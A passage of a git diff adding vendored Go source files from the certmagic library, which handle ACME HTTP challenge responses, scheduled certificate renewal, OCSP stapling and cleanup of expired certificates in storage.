// distributedHTTPChallengeSolver checks to see if this challenge
|
||||
// request was initiated by this or another instance which uses the
|
||||
// same storage as am does, and attempts to complete the challenge for
|
||||
// it. It returns true if the request was handled; false otherwise.
|
||||
func (am *ACMEIssuer) distributedHTTPChallengeSolver(w http.ResponseWriter, r *http.Request) bool {
|
||||
if am == nil {
|
||||
return false
|
||||
}
|
||||
host := hostOnly(r.Host)
|
||||
chalInfo, distributed, err := am.config.getChallengeInfo(r.Context(), host)
|
||||
if err != nil {
|
||||
if am.Logger != nil {
|
||||
am.Logger.Error("looking up info for HTTP challenge",
|
||||
zap.String("host", host),
|
||||
zap.Error(err))
|
||||
}
|
||||
return false
|
||||
}
|
||||
return solveHTTPChallenge(am.Logger, w, r, chalInfo.Challenge, distributed)
|
||||
}
|
||||
|
||||
// solveHTTPChallenge solves the HTTP challenge using the given challenge information.
|
||||
// If the challenge is being solved in a distributed fahsion, set distributed to true for logging purposes.
|
||||
// It returns true the properties of the request check out in relation to the HTTP challenge.
|
||||
// Most of this code borrowed from xenolf's built-in HTTP-01 challenge solver in March 2018.
|
||||
func solveHTTPChallenge(logger *zap.Logger, w http.ResponseWriter, r *http.Request, challenge acme.Challenge, distributed bool) bool {
|
||||
challengeReqPath := challenge.HTTP01ResourcePath()
|
||||
if r.URL.Path == challengeReqPath &&
|
||||
strings.EqualFold(hostOnly(r.Host), challenge.Identifier.Value) && // mitigate DNS rebinding attacks
|
||||
r.Method == "GET" {
|
||||
w.Header().Add("Content-Type", "text/plain")
|
||||
w.Write([]byte(challenge.KeyAuthorization))
|
||||
r.Close = true
|
||||
if logger != nil {
|
||||
logger.Info("served key authentication",
|
||||
zap.String("identifier", challenge.Identifier.Value),
|
||||
zap.String("challenge", "http-01"),
|
||||
zap.String("remote", r.RemoteAddr),
|
||||
zap.Bool("distributed", distributed))
|
||||
}
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// SolveHTTPChallenge solves the HTTP challenge. It should be used only on HTTP requests that are
|
||||
// from ACME servers trying to validate an identifier (i.e. LooksLikeHTTPChallenge() == true). It
|
||||
// returns true if the request criteria check out and it answered with key authentication, in which
|
||||
// case no further handling of the request is necessary.
|
||||
func SolveHTTPChallenge(logger *zap.Logger, w http.ResponseWriter, r *http.Request, challenge acme.Challenge) bool {
|
||||
return solveHTTPChallenge(logger, w, r, challenge, false)
|
||||
}
|
||||
|
||||
// LooksLikeHTTPChallenge returns true if r looks like an ACME
|
||||
// HTTP challenge request from an ACME server.
|
||||
func LooksLikeHTTPChallenge(r *http.Request) bool {
|
||||
return r.Method == "GET" && strings.HasPrefix(r.URL.Path, challengeBasePath)
|
||||
}
|
||||
|
||||
const challengeBasePath = "/.well-known/acme-challenge"
|
678
vendor/github.com/caddyserver/certmagic/maintain.go
generated
vendored
Normal file
678
vendor/github.com/caddyserver/certmagic/maintain.go
generated
vendored
Normal file
@ -0,0 +1,678 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/x509"
|
||||
"encoding/pem"
|
||||
"fmt"
|
||||
"log"
|
||||
"path"
|
||||
"runtime"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/mholt/acmez/acme"
|
||||
"go.uber.org/zap"
|
||||
"golang.org/x/crypto/ocsp"
|
||||
)
|
||||
|
||||
// maintainAssets is a permanently-blocking function
|
||||
// that loops indefinitely and, on a regular schedule, checks
|
||||
// certificates for expiration and initiates a renewal of certs
|
||||
// that are expiring soon. It also updates OCSP stapling. It
|
||||
// should only be called once per cache. Panics are recovered,
|
||||
// and if panicCount < 10, the function is called recursively,
|
||||
// incrementing panicCount each time. Initial invocation should
|
||||
// start panicCount at 0.
|
||||
func (certCache *Cache) maintainAssets(panicCount int) {
|
||||
log := loggerNamed(certCache.logger, "maintenance")
|
||||
if log != nil {
|
||||
log = log.With(zap.String("cache", fmt.Sprintf("%p", certCache)))
|
||||
}
|
||||
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
if log != nil {
|
||||
log.Error("panic", zap.Any("error", err), zap.ByteString("stack", buf))
|
||||
}
|
||||
if panicCount < 10 {
|
||||
certCache.maintainAssets(panicCount + 1)
|
||||
}
|
||||
}
|
||||
}()
|
||||
|
||||
renewalTicker := time.NewTicker(certCache.options.RenewCheckInterval)
|
||||
ocspTicker := time.NewTicker(certCache.options.OCSPCheckInterval)
|
||||
|
||||
if log != nil {
|
||||
log.Info("started background certificate maintenance")
|
||||
}
|
||||
|
||||
ctx, cancel := context.WithCancel(context.Background())
|
||||
defer cancel()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-renewalTicker.C:
|
||||
err := certCache.RenewManagedCertificates(ctx)
|
||||
if err != nil && log != nil {
|
||||
log.Error("renewing managed certificates", zap.Error(err))
|
||||
}
|
||||
case <-ocspTicker.C:
|
||||
certCache.updateOCSPStaples(ctx)
|
||||
case <-certCache.stopChan:
|
||||
renewalTicker.Stop()
|
||||
ocspTicker.Stop()
|
||||
if log != nil {
|
||||
log.Info("stopped background certificate maintenance")
|
||||
}
|
||||
close(certCache.doneChan)
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// RenewManagedCertificates renews managed certificates,
|
||||
// including ones loaded on-demand. Note that this is done
|
||||
// automatically on a regular basis; normally you will not
|
||||
// need to call this. This method assumes non-interactive
|
||||
// mode (i.e. operating in the background).
|
||||
func (certCache *Cache) RenewManagedCertificates(ctx context.Context) error {
|
||||
log := loggerNamed(certCache.logger, "maintenance")
|
||||
|
||||
// configs will hold a map of certificate name to the config
|
||||
// to use when managing that certificate
|
||||
configs := make(map[string]*Config)
|
||||
|
||||
// we use the queues for a very important reason: to do any and all
|
||||
// operations that could require an exclusive write lock outside
|
||||
// of the read lock! otherwise we get a deadlock, yikes. in other
|
||||
// words, our first iteration through the certificate cache does NOT
|
||||
// perform any operations--only queues them--so that more fine-grained
|
||||
// write locks may be obtained during the actual operations.
|
||||
var renewQueue, reloadQueue, deleteQueue []Certificate
|
||||
|
||||
certCache.mu.RLock()
|
||||
for certKey, cert := range certCache.cache {
|
||||
if !cert.managed {
|
||||
continue
|
||||
}
|
||||
|
||||
// the list of names on this cert should never be empty... programmer error?
|
||||
if cert.Names == nil || len(cert.Names) == 0 {
|
||||
if log != nil {
|
||||
log.Warn("certificate has no names; removing from cache", zap.String("cert_key", certKey))
|
||||
}
|
||||
deleteQueue = append(deleteQueue, cert)
|
||||
continue
|
||||
}
|
||||
|
||||
// get the config associated with this certificate
|
||||
cfg, err := certCache.getConfig(cert)
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("unable to get configuration to manage certificate; unable to renew",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
continue
|
||||
}
|
||||
if cfg == nil {
|
||||
// this is bad if this happens, probably a programmer error (oops)
|
||||
if log != nil {
|
||||
log.Error("no configuration associated with certificate; unable to manage",
|
||||
zap.Strings("identifiers", cert.Names))
|
||||
}
|
||||
continue
|
||||
}
|
||||
if cfg.OnDemand != nil {
|
||||
continue
|
||||
}
|
||||
|
||||
// if time is up or expires soon, we need to try to renew it
|
||||
if cert.NeedsRenewal(cfg) {
|
||||
configs[cert.Names[0]] = cfg
|
||||
|
||||
// see if the certificate in storage has already been renewed, possibly by another
|
||||
// instance that didn't coordinate with this one; if so, just load it (this
|
||||
// might happen if another instance already renewed it - kinda sloppy but checking disk
|
||||
// first is a simple way to possibly drastically reduce rate limit problems)
|
||||
storedCertExpiring, err := cfg.managedCertInStorageExpiresSoon(ctx, cert)
|
||||
if err != nil {
|
||||
// hmm, weird, but not a big deal, maybe it was deleted or something
|
||||
if log != nil {
|
||||
log.Warn("error while checking if stored certificate is also expiring soon",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
} else if !storedCertExpiring {
|
||||
// if the certificate is NOT expiring soon and there was no error, then we
|
||||
// are good to just reload the certificate from storage instead of repeating
|
||||
// a likely-unnecessary renewal procedure
|
||||
reloadQueue = append(reloadQueue, cert)
|
||||
continue
|
||||
}
|
||||
|
||||
// the certificate in storage has not been renewed yet, so we will do it
|
||||
// NOTE: It is super-important to note that the TLS-ALPN challenge requires
|
||||
// a write lock on the cache in order to complete its challenge, so it is extra
|
||||
// vital that this renew operation does not happen inside our read lock!
|
||||
renewQueue = append(renewQueue, cert)
|
||||
}
|
||||
}
|
||||
certCache.mu.RUnlock()
|
||||
|
||||
// Reload certificates that merely need to be updated in memory
|
||||
for _, oldCert := range reloadQueue {
|
||||
timeLeft := oldCert.Leaf.NotAfter.Sub(time.Now().UTC())
|
||||
if log != nil {
|
||||
log.Info("certificate expires soon, but is already renewed in storage; reloading stored certificate",
|
||||
zap.Strings("identifiers", oldCert.Names),
|
||||
zap.Duration("remaining", timeLeft))
|
||||
}
|
||||
|
||||
cfg := configs[oldCert.Names[0]]
|
||||
|
||||
// crucially, this happens OUTSIDE a lock on the certCache
|
||||
_, err := cfg.reloadManagedCertificate(ctx, oldCert)
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("loading renewed certificate",
|
||||
zap.Strings("identifiers", oldCert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
continue
|
||||
}
|
||||
}
|
||||
|
||||
// Renewal queue
|
||||
for _, oldCert := range renewQueue {
|
||||
cfg := configs[oldCert.Names[0]]
|
||||
err := certCache.queueRenewalTask(ctx, oldCert, cfg)
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("queueing renewal task",
|
||||
zap.Strings("identifiers", oldCert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
continue
|
||||
}
|
||||
}
|
||||
|
||||
// Deletion queue
|
||||
certCache.mu.Lock()
|
||||
for _, cert := range deleteQueue {
|
||||
certCache.removeCertificate(cert)
|
||||
}
|
||||
certCache.mu.Unlock()
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (certCache *Cache) queueRenewalTask(ctx context.Context, oldCert Certificate, cfg *Config) error {
|
||||
log := loggerNamed(certCache.logger, "maintenance")
|
||||
|
||||
timeLeft := oldCert.Leaf.NotAfter.Sub(time.Now().UTC())
|
||||
if log != nil {
|
||||
log.Info("certificate expires soon; queuing for renewal",
|
||||
zap.Strings("identifiers", oldCert.Names),
|
||||
zap.Duration("remaining", timeLeft))
|
||||
}
|
||||
|
||||
// Get the name which we should use to renew this certificate;
|
||||
// we only support managing certificates with one name per cert,
|
||||
// so this should be easy.
|
||||
renewName := oldCert.Names[0]
|
||||
|
||||
// queue up this renewal job (is a no-op if already active or queued)
|
||||
jm.Submit(cfg.Logger, "renew_"+renewName, func() error {
|
||||
timeLeft := oldCert.Leaf.NotAfter.Sub(time.Now().UTC())
|
||||
if log != nil {
|
||||
log.Info("attempting certificate renewal",
|
||||
zap.Strings("identifiers", oldCert.Names),
|
||||
zap.Duration("remaining", timeLeft))
|
||||
}
|
||||
|
||||
// perform renewal - crucially, this happens OUTSIDE a lock on certCache
|
||||
err := cfg.RenewCertAsync(ctx, renewName, false)
|
||||
if err != nil {
|
||||
if cfg.OnDemand != nil {
|
||||
// loaded dynamically, remove dynamically
|
||||
certCache.mu.Lock()
|
||||
certCache.removeCertificate(oldCert)
|
||||
certCache.mu.Unlock()
|
||||
}
|
||||
return fmt.Errorf("%v %v", oldCert.Names, err)
|
||||
}
|
||||
|
||||
// successful renewal, so update in-memory cache by loading
|
||||
// renewed certificate so it will be used with handshakes
|
||||
_, err = cfg.reloadManagedCertificate(ctx, oldCert)
|
||||
if err != nil {
|
||||
return ErrNoRetry{fmt.Errorf("%v %v", oldCert.Names, err)}
|
||||
}
|
||||
return nil
|
||||
})
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// updateOCSPStaples updates the OCSP stapling in all
|
||||
// eligible, cached certificates.
|
||||
//
|
||||
// OCSP maintenance strives to abide the relevant points on
|
||||
// Ryan Sleevi's recommendations for good OCSP support:
|
||||
// https://gist.github.com/sleevi/5efe9ef98961ecfb4da8
|
||||
func (certCache *Cache) updateOCSPStaples(ctx context.Context) {
|
||||
logger := loggerNamed(certCache.logger, "maintenance")
|
||||
|
||||
// temporary structures to store updates or tasks
|
||||
// so that we can keep our locks short-lived
|
||||
type ocspUpdate struct {
|
||||
rawBytes []byte
|
||||
parsed *ocsp.Response
|
||||
}
|
||||
type updateQueueEntry struct {
|
||||
cert Certificate
|
||||
certHash string
|
||||
lastNextUpdate time.Time
|
||||
cfg *Config
|
||||
}
|
||||
type renewQueueEntry struct {
|
||||
oldCert Certificate
|
||||
cfg *Config
|
||||
}
|
||||
updated := make(map[string]ocspUpdate)
|
||||
var updateQueue []updateQueueEntry // certs that need a refreshed staple
|
||||
var renewQueue []renewQueueEntry // certs that need to be renewed (due to revocation)
|
||||
|
||||
// obtain brief read lock during our scan to see which staples need updating
|
||||
certCache.mu.RLock()
|
||||
for certHash, cert := range certCache.cache {
|
||||
// no point in updating OCSP for expired or "synthetic" certificates
|
||||
if cert.Leaf == nil || cert.Expired() {
|
||||
continue
|
||||
}
|
||||
cfg, err := certCache.getConfig(cert)
|
||||
if err != nil {
|
||||
if logger != nil {
|
||||
logger.Error("unable to get automation config for certificate; maintenance for this certificate will likely fail",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
continue
|
||||
}
|
||||
// always try to replace revoked certificates, even if OCSP response is still fresh
|
||||
if certShouldBeForceRenewed(cert) {
|
||||
renewQueue = append(renewQueue, renewQueueEntry{
|
||||
oldCert: cert,
|
||||
cfg: cfg,
|
||||
})
|
||||
continue
|
||||
}
|
||||
// if the status is not fresh, get a new one
|
||||
var lastNextUpdate time.Time
|
||||
if cert.ocsp != nil {
|
||||
lastNextUpdate = cert.ocsp.NextUpdate
|
||||
if cert.ocsp.Status != ocsp.Unknown && freshOCSP(cert.ocsp) {
|
||||
// no need to update our staple if still fresh and not Unknown
|
||||
continue
|
||||
}
|
||||
}
|
||||
updateQueue = append(updateQueue, updateQueueEntry{cert, certHash, lastNextUpdate, cfg})
|
||||
}
|
||||
certCache.mu.RUnlock()
|
||||
|
||||
// perform updates outside of any lock on certCache
|
||||
for _, qe := range updateQueue {
|
||||
cert := qe.cert
|
||||
certHash := qe.certHash
|
||||
lastNextUpdate := qe.lastNextUpdate
|
||||
|
||||
if qe.cfg == nil {
|
||||
// this is bad if this happens, probably a programmer error (oops)
|
||||
if logger != nil {
|
||||
logger.Error("no configuration associated with certificate; unable to manage OCSP staples",
|
||||
zap.Strings("identifiers", cert.Names))
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
err := stapleOCSP(ctx, qe.cfg.OCSP, qe.cfg.Storage, &cert, nil)
|
||||
if err != nil {
|
||||
if cert.ocsp != nil {
|
||||
// if there was no staple before, that's fine; otherwise we should log the error
|
||||
if logger != nil {
|
||||
logger.Error("stapling OCSP",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
// By this point, we've obtained the latest OCSP response.
|
||||
// If there was no staple before, or if the response is updated, make
|
||||
// sure we apply the update to all names on the certificate if
|
||||
// the status is still Good.
|
||||
if cert.ocsp != nil && cert.ocsp.Status == ocsp.Good && (lastNextUpdate.IsZero() || lastNextUpdate != cert.ocsp.NextUpdate) {
|
||||
if logger != nil {
|
||||
logger.Info("advancing OCSP staple",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Time("from", lastNextUpdate),
|
||||
zap.Time("to", cert.ocsp.NextUpdate))
|
||||
}
|
||||
updated[certHash] = ocspUpdate{rawBytes: cert.Certificate.OCSPStaple, parsed: cert.ocsp}
|
||||
}
|
||||
|
||||
// If the updated staple shows that the certificate was revoked, we should immediately renew it
|
||||
if certShouldBeForceRenewed(cert) {
|
||||
renewQueue = append(renewQueue, renewQueueEntry{
|
||||
oldCert: cert,
|
||||
cfg: qe.cfg,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// These write locks should be brief since we have all the info we need now.
|
||||
for certKey, update := range updated {
|
||||
certCache.mu.Lock()
|
||||
if cert, ok := certCache.cache[certKey]; ok {
|
||||
cert.ocsp = update.parsed
|
||||
cert.Certificate.OCSPStaple = update.rawBytes
|
||||
certCache.cache[certKey] = cert
|
||||
}
|
||||
certCache.mu.Unlock()
|
||||
}
|
||||
|
||||
// We attempt to replace any certificates that were revoked.
|
||||
// Crucially, this happens OUTSIDE a lock on the certCache.
|
||||
for _, renew := range renewQueue {
|
||||
_, err := renew.cfg.forceRenew(ctx, logger, renew.oldCert)
|
||||
if err != nil && logger != nil {
|
||||
logger.Info("forcefully renewing certificate due to REVOKED status",
|
||||
zap.Strings("identifiers", renew.oldCert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// CleanStorageOptions specifies how to clean up a storage unit.
|
||||
type CleanStorageOptions struct {
|
||||
OCSPStaples bool
|
||||
ExpiredCerts bool
|
||||
ExpiredCertGracePeriod time.Duration
|
||||
}
|
||||
|
||||
// CleanStorage removes assets which are no longer useful,
|
||||
// according to opts.
|
||||
func CleanStorage(ctx context.Context, storage Storage, opts CleanStorageOptions) {
|
||||
if opts.OCSPStaples {
|
||||
err := deleteOldOCSPStaples(ctx, storage)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Deleting old OCSP staples: %v", err)
|
||||
}
|
||||
}
|
||||
if opts.ExpiredCerts {
|
||||
err := deleteExpiredCerts(ctx, storage, opts.ExpiredCertGracePeriod)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Deleting expired certificates: %v", err)
|
||||
}
|
||||
}
|
||||
// TODO: delete stale locks?
|
||||
}
|
||||
|
||||
func deleteOldOCSPStaples(ctx context.Context, storage Storage) error {
|
||||
ocspKeys, err := storage.List(ctx, prefixOCSP, false)
|
||||
if err != nil {
|
||||
// maybe just hasn't been created yet; no big deal
|
||||
return nil
|
||||
}
|
||||
for _, key := range ocspKeys {
|
||||
// if context was cancelled, quit early; otherwise proceed
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
default:
|
||||
}
|
||||
ocspBytes, err := storage.Load(ctx, key)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] While deleting old OCSP staples, unable to load staple file: %v", err)
|
||||
continue
|
||||
}
|
||||
resp, err := ocsp.ParseResponse(ocspBytes, nil)
|
||||
if err != nil {
|
||||
// contents are invalid; delete it
|
||||
err = storage.Delete(ctx, key)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Purging corrupt staple file %s: %v", key, err)
|
||||
}
|
||||
continue
|
||||
}
|
||||
if time.Now().After(resp.NextUpdate) {
|
||||
// response has expired; delete it
|
||||
err = storage.Delete(ctx, key)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Purging expired staple file %s: %v", key, err)
|
||||
}
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func deleteExpiredCerts(ctx context.Context, storage Storage, gracePeriod time.Duration) error {
|
||||
issuerKeys, err := storage.List(ctx, prefixCerts, false)
|
||||
if err != nil {
|
||||
// maybe just hasn't been created yet; no big deal
|
||||
return nil
|
||||
}
|
||||
|
||||
for _, issuerKey := range issuerKeys {
|
||||
siteKeys, err := storage.List(ctx, issuerKey, false)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Listing contents of %s: %v", issuerKey, err)
|
||||
continue
|
||||
}
|
||||
|
||||
for _, siteKey := range siteKeys {
|
||||
// if context was cancelled, quit early; otherwise proceed
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
default:
|
||||
}
|
||||
|
||||
siteAssets, err := storage.List(ctx, siteKey, false)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Listing contents of %s: %v", siteKey, err)
|
||||
continue
|
||||
}
|
||||
|
||||
for _, assetKey := range siteAssets {
|
||||
if path.Ext(assetKey) != ".crt" {
|
||||
continue
|
||||
}
|
||||
|
||||
certFile, err := storage.Load(ctx, assetKey)
|
||||
if err != nil {
|
||||
return fmt.Errorf("loading certificate file %s: %v", assetKey, err)
|
||||
}
|
||||
block, _ := pem.Decode(certFile)
|
||||
if block == nil || block.Type != "CERTIFICATE" {
|
||||
return fmt.Errorf("certificate file %s does not contain PEM-encoded certificate", assetKey)
|
||||
}
|
||||
cert, err := x509.ParseCertificate(block.Bytes)
|
||||
if err != nil {
|
||||
return fmt.Errorf("certificate file %s is malformed; error parsing PEM: %v", assetKey, err)
|
||||
}
|
||||
|
||||
if expiredTime := time.Since(cert.NotAfter); expiredTime >= gracePeriod {
|
||||
log.Printf("[INFO] Certificate %s expired %s ago; cleaning up", assetKey, expiredTime)
|
||||
baseName := strings.TrimSuffix(assetKey, ".crt")
|
||||
for _, relatedAsset := range []string{
|
||||
assetKey,
|
||||
baseName + ".key",
|
||||
baseName + ".json",
|
||||
} {
|
||||
log.Printf("[INFO] Deleting %s because resource expired", relatedAsset)
|
||||
err := storage.Delete(ctx, relatedAsset)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Cleaning up asset related to expired certificate for %s: %s: %v",
|
||||
baseName, relatedAsset, err)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// update listing; if folder is empty, delete it
|
||||
siteAssets, err = storage.List(ctx, siteKey, false)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
if len(siteAssets) == 0 {
|
||||
log.Printf("[INFO] Deleting %s because key is empty", siteKey)
|
||||
err := storage.Delete(ctx, siteKey)
|
||||
if err != nil {
|
||||
return fmt.Errorf("deleting empty site folder %s: %v", siteKey, err)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// forceRenew forcefully renews cert and replaces it in the cache, and returns the new certificate. It is intended
|
||||
// for use primarily in the case of cert revocation. This MUST NOT be called within a lock on cfg.certCacheMu.
|
||||
func (cfg *Config) forceRenew(ctx context.Context, logger *zap.Logger, cert Certificate) (Certificate, error) {
|
||||
if logger != nil {
|
||||
if cert.ocsp != nil && cert.ocsp.Status == ocsp.Revoked {
|
||||
logger.Warn("OCSP status for managed certificate is REVOKED; attempting to replace with new certificate",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter))
|
||||
} else {
|
||||
logger.Warn("forcefully renewing certificate",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter))
|
||||
}
|
||||
}
|
||||
|
||||
renewName := cert.Names[0]
|
||||
|
||||
// if revoked for key compromise, we can't be sure whether the storage of
|
||||
// the key is still safe; however, we KNOW the old key is not safe, and we
|
||||
// can only hope by the time of revocation that storage has been secured;
|
||||
// key management is not something we want to get into, but in this case
|
||||
// it seems prudent to replace the key - and since renewal requires reuse
|
||||
// of a prior key, we can't do a "renew" to replace the cert if we need a
|
||||
// new key, so we'll have to do an obtain instead
|
||||
var obtainInsteadOfRenew bool
|
||||
if cert.ocsp != nil && cert.ocsp.RevocationReason == acme.ReasonKeyCompromise {
|
||||
err := cfg.moveCompromisedPrivateKey(ctx, cert, logger)
|
||||
if err != nil && logger != nil {
|
||||
logger.Error("could not remove compromised private key from use",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.String("issuer", cert.issuerKey),
|
||||
zap.Error(err))
|
||||
}
|
||||
obtainInsteadOfRenew = true
|
||||
}
|
||||
|
||||
var err error
|
||||
if obtainInsteadOfRenew {
|
||||
err = cfg.ObtainCertAsync(ctx, renewName)
|
||||
} else {
|
||||
// notice that we force renewal; otherwise, it might see that the
|
||||
// certificate isn't close to expiring and return, but we really
|
||||
// need a replacement certificate! see issue #4191
|
||||
err = cfg.RenewCertAsync(ctx, renewName, true)
|
||||
}
|
||||
if err != nil {
|
||||
if cert.ocsp != nil && cert.ocsp.Status == ocsp.Revoked {
|
||||
// probably better to not serve a revoked certificate at all
|
||||
if logger != nil {
|
||||
logger.Error("unable to obtain new to certificate after OCSP status of REVOKED; removing from cache",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
cfg.certCache.mu.Lock()
|
||||
cfg.certCache.removeCertificate(cert)
|
||||
cfg.certCache.mu.Unlock()
|
||||
}
|
||||
return cert, fmt.Errorf("unable to forcefully get new certificate for %v: %w", cert.Names, err)
|
||||
}
|
||||
|
||||
return cfg.reloadManagedCertificate(ctx, cert)
|
||||
}
|
||||
|
||||
// moveCompromisedPrivateKey moves the private key for cert to a ".compromised" file
|
||||
// by copying the data to the new file, then deleting the old one.
|
||||
func (cfg *Config) moveCompromisedPrivateKey(ctx context.Context, cert Certificate, logger *zap.Logger) error {
|
||||
privKeyStorageKey := StorageKeys.SitePrivateKey(cert.issuerKey, cert.Names[0])
|
||||
|
||||
privKeyPEM, err := cfg.Storage.Load(ctx, privKeyStorageKey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
compromisedPrivKeyStorageKey := privKeyStorageKey + ".compromised"
|
||||
err = cfg.Storage.Store(ctx, compromisedPrivKeyStorageKey, privKeyPEM)
|
||||
if err != nil {
|
||||
// better safe than sorry: as a last resort, try deleting the key so it won't be reused
|
||||
cfg.Storage.Delete(ctx, privKeyStorageKey)
|
||||
return err
|
||||
}
|
||||
|
||||
err = cfg.Storage.Delete(ctx, privKeyStorageKey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
logger.Info("removed certificate's compromised private key from use",
|
||||
zap.String("storage_path", compromisedPrivKeyStorageKey),
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.String("issuer", cert.issuerKey))
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// certShouldBeForceRenewed returns true if cert should be forcefully renewed
|
||||
// (like if it is revoked according to its OCSP response).
|
||||
func certShouldBeForceRenewed(cert Certificate) bool {
|
||||
return cert.managed &&
|
||||
len(cert.Names) > 0 &&
|
||||
cert.ocsp != nil &&
|
||||
cert.ocsp.Status == ocsp.Revoked
|
||||
}
|
||||
|
||||
const (
|
||||
// DefaultRenewCheckInterval is how often to check certificates for expiration.
|
||||
// Scans are very lightweight, so this can be semi-frequent. This default should
|
||||
// be smaller than <Minimum Cert Lifetime>*DefaultRenewalWindowRatio/3, which
|
||||
// gives certificates plenty of chance to be renewed on time.
|
||||
DefaultRenewCheckInterval = 10 * time.Minute
|
||||
|
||||
// DefaultRenewalWindowRatio is how much of a certificate's lifetime becomes the
|
||||
// renewal window. The renewal window is the span of time at the end of the
|
||||
// certificate's validity period in which it should be renewed. A default value
|
||||
// of ~1/3 is pretty safe and recommended for most certificates.
|
||||
DefaultRenewalWindowRatio = 1.0 / 3.0
|
||||
|
||||
// DefaultOCSPCheckInterval is how often to check if OCSP stapling needs updating.
|
||||
DefaultOCSPCheckInterval = 1 * time.Hour
|
||||
)
|
233
vendor/github.com/caddyserver/certmagic/ocsp.go
generated
vendored
Normal file
233
vendor/github.com/caddyserver/certmagic/ocsp.go
generated
vendored
Normal file
@ -0,0 +1,233 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"crypto/x509"
|
||||
"encoding/pem"
|
||||
"fmt"
|
||||
"io"
|
||||
"log"
|
||||
"net/http"
|
||||
"time"
|
||||
|
||||
"golang.org/x/crypto/ocsp"
|
||||
)
|
||||
|
||||
// stapleOCSP staples OCSP information to cert for hostname name.
|
||||
// If you have it handy, you should pass in the PEM-encoded certificate
|
||||
// bundle; otherwise the DER-encoded cert will have to be PEM-encoded.
|
||||
// If you don't have the PEM blocks already, just pass in nil.
|
||||
//
|
||||
// If successful, the OCSP response will be set to cert's ocsp field,
|
||||
// regardless of the OCSP status. It is only stapled, however, if the
|
||||
// status is Good.
|
||||
//
|
||||
// Errors here are not necessarily fatal, it could just be that the
|
||||
// certificate doesn't have an issuer URL.
|
||||
func stapleOCSP(ctx context.Context, ocspConfig OCSPConfig, storage Storage, cert *Certificate, pemBundle []byte) error {
|
||||
if ocspConfig.DisableStapling {
|
||||
return nil
|
||||
}
|
||||
|
||||
if pemBundle == nil {
|
||||
// we need a PEM encoding only for some function calls below
|
||||
bundle := new(bytes.Buffer)
|
||||
for _, derBytes := range cert.Certificate.Certificate {
|
||||
pem.Encode(bundle, &pem.Block{Type: "CERTIFICATE", Bytes: derBytes})
|
||||
}
